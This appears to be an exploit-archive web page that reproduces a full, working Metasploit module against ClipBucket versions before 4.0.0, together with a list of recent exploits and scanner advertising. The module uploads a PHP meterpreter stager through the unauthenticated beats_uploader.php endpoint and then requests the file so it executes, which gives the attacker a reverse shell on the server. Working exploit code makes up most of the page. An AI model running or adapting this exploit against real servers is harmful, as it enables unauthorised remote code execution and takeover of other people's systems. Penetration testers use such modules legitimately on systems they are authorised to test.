clipbucket beats_uploader arbitrary file upload (metasploit)

▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability

Online Vulnerability Scanner Tools

Code...

				
##
# This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "ClipBucket beats_uploader Unauthenticated Arbitrary File Upload",
      'Description'    => %q{
        This module exploits a vulnerability found in ClipBucket versions before 4.0.0 (Release 4902).
        A malicious file can be uploaded using an unauthenticated arbitrary file upload vulnerability.
        It is possible for an attacker to upload a malicious script to issue operating system commands.
        This issue is caused by improper session handling in /action/beats_uploader.php file.
        This module was tested on ClipBucket before 4.0.0 - Release 4902 on Windows 7 and Kali Linux.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'www.sec-consult.com', # Vulnerability Discovery, PoC
          'Touhid M.Shaikh <admin[at]touhidshaikh.com>' # Metasploit module
        ],
      'References'      =>
        [
          [ 'EDB', '44250' ]
        ],
      'DefaultOptions' =>
          {
            'SSL'     => false,
            'PAYLOAD' => 'php/meterpreter/reverse_tcp',
            'Encoder' => 'php/base64'
          },
      'Platform'        => ['php'],
      'Arch'            => ARCH_PHP,
      'Targets'         =>
        [
          ['Clipbucket < 4.0.0 - Release 4902', {}]
        ],
      'Privileged'      => false,
      'DisclosureDate'  => "Mar 03 2018",
      'DefaultTarget'   => 0))

    register_options(
      [
       OptString.new('TARGETURI', [true, 'The base path to the ClipBucket application', '/'])
      ])
  end

  def uri
    return target_uri.path
  end

  def check
    vprint_status('Trying to detect ClipBucket on target.')

    # check for readme file
    res = send_request_cgi({
     'method' => 'GET',
     'uri'    => normalize_uri(uri, 'readme')
    })

    unless res
      vprint_error('Connection failed')
      return CheckCode::Unknown
    end

    unless res.code == 200 && res.body.include?('ClipBucket')
      vprint_error('Could not find readme')
      return CheckCode::Safe
    end

    # check for beats_uploader.php file
    res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(uri, 'actions', 'beats_uploader.php')
    })

    unless res
      vprint_error('Connection failed')
      return CheckCode::Unknown
    end

    unless res.code == 200
      vprint_error('Could not find beats_uploader.php')
      return CheckCode::Safe
    end

    Exploit::CheckCode::Appears
  end

  def exploit

    # generate the PHP meterpreter payload
    stager = '<?php '
    stager << payload.encode
    stager << '?>'

    # Setting POST data
    post_data = Rex::MIME::Message.new
    post_data.add_part(stager, content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = 'form-data; name="file"; filename="pfile.php"') # payload
    post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="plupload"') # require for uploading
    post_data.add_part('agent22.php', content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="name"')
    data = post_data.to_s


    print_status('Uploading payload..')
    res = send_request_cgi({
        'method' => 'POST',
        'uri'    => normalize_uri(uri, 'actions', 'beats_uploader.php'),
        'data'  => data,
        'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
    })

    jsonres = res.get_json_document

    # If the server returns 200 and success yes, we assume we uploaded the malicious
    # file successfully
    unless res && res.code == 200 && jsonres['success'] == 'yes'
      fail_with(Failure::None, "#{peer} - File wasn't uploaded, aborting!")
    end
    print_good('Looking For Payload..')
    pdir = jsonres['file_directory']
    file_name = jsonres['file_name']
    pext = jsonres['extension']
    print_good("found payload in /actions/#{pdir}/#{file_name}.#{pext}")

    # Payload name
    pname = "#{file_name}.php"

    # Cleanup is Good Idea .
    register_files_for_cleanup(pname)

    print_status("Executing Payload [ #{uri}/actions/#{pdir}/#{pname} ]" )
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, 'actions', pdir, pname)
    })

    # If we don't get a 200 when we request our malicious payload, we suspect
    # we don't have a shell, either.
    if res && res.code != 200
      print_error('Unexpected response, probably the exploit failed')
    end
  end
end

Clipbucket beats_uploader arbitrary file upload (metasploit) Vulnerability / Exploit Source : Clipbucket beats_uploader arbitrary file upload (metasploit)

Last Vulnerability or Exploits

▸ gitlab 14.9 - stored cross-site scripting (xss) ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ gitlab 14.9 - authentication bypass ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ easeus data recovery - 'ensserver.exe' unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

▸ ptpublisher v2.3.4 - unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Discover posible vulnerabilities before GO LIVE with your project
Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Do an audit to find and close the high risk issues before having a real damage and increase the costs
Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Bypass your network restrictions and scan from our IP for relevant results
Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Scan your website from any device with internet connection

Tusted by

Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.